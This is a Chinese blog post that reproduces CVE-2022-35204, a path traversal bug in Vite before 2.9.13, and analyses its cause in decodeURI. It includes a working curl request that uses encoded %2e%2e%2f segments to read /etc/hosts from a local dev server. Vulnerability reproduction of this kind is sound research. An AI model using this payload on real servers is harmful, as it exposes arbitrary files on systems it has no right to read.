首页 关于 友链

CVE-2022-35204

swwind

Vite 是 Vite 开源的一种新型的前端构建工具。

Vite v2.9.13 之前版本存在安全漏洞,该漏洞源于允许攻击者通过精心设计的 URL 对受害者的服务执行目录遍历。

漏洞详情信息表

漏洞名称Vite 路径遍历漏洞
CNNVD 编号CNNVD-202208-3372
CVE 编号CVE-2022-35204
厂商Vite
危害等级低危
漏洞类型路径遍历

系统和软件环境配置详情信息表

  • node v20.2.0
  • yarn v1.22.19
  • vite v2.9.12

漏洞还原详细步骤

  1. 使用 mkdir CVE-2022-35204 指令新建目录用于测试。
  2. 使用 yarn init 创建新的 nodejs 项目。
  3. 使用 yarn add [email protected] 安装带有缺陷的 vite 版本。

漏洞测试或验证详细步骤

编写代码

创建 index.html,简单写入任意 HTML 页面,如下样例。

<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Vite</title>
  </head>
  <body>
    There is nothing to observe
  </body>
</html>

运行程序

使用 yarn vite dev 开启 vite 开发模式服务器,可以看到程序默认监听了 localhost:3000 地址端口。

访问 http://localhost:3000 可以看到我们在 index.html 中编写的内容。

验证漏洞

vite 默认启用的 /@fs/ 路由用于访问任意本地文件,但是只限于项目仓库目录下的文件。

例如我们构造一个请求 URL 形如 http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/index.html,这个 URL 指向的是我们方才创建的 index.html,并且在项目的目录下,因此可以正常访问。我们使用 curl 测试这个路径的访问情况。

curl http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/index.html

程序输出如下

我们尝试访问一个不在项目路径下的文件,例如 /etc/hosts 文件,可以看到 vite 拒绝了我们的请求。

curl http://localhost:3000/@fs/etc/hosts

漏洞的关键在于,我们可以使用 %2e%2e%2f(经过 encodeURIComponent 之后的 ../)来索引到父级目录,从而绕过 vite 的路径验证。

值得注意的是使用 curl 必须要带上 --path-as-is 参数,防止 curl 自己展开 ../

curl --path-as-is http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/hosts

可以看到成功绕过了 vite 的路径检测,成功访问到了系统中的任意文件。

漏洞分析

漏洞出现的原因在于 vite 错误地使用了 decodeURI 函数来对输入的参数进行反序列化。

decodeURI 函数在解码时会将大部分 ASCII 标点符号和预留字符保留不变,包括 /(斜杠)和 %2f(斜杠的编码形式)。

相比之下,decodeURIComponent 函数仅解码 URI 组件中的字符,而不是完整的 URI。它可以正确解码任何 ASCII 字符或 UTF-8 字符集,包括默认 URI 编码中使用的所有预留字符和其他特殊字符。因此,在处理普通的、标准的或非标准的 URI 时,decodeURIComponent 函数通常是更安全和可靠的选择。

在这个漏洞的情形下,当传入的参数是 /home/swwind/tmp/cve/CVE-2022-35204/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/hosts 的时候,decodeURI 函数解析出来的结果会保留其中的所有 %2f,再经由下一步的 path.resolve 函数解析,最终结果是 /home/swwind/tmp/cve/CVE-2022-35204/..%2f..%2f..%2f..%2f../etc/hosts,由此非常轻松地就绕过了 vite 的允许目录检查。

相比之下,如果使用了安全的 decodeURIComponent 函数,那么第一步解析出来的结果就会是 /home/swwind/tmp/cve/CVE-2022-35204/../../../../../etc/hosts,经过第二步 path.resolve 解析之后的结果将会是 /etc/hosts,从而有效防止此类攻击。

Copyright © 2017-2024 swwind. All rights reserved
Except where otherwise noted, content on this blog is licensed under CC-BY 2.0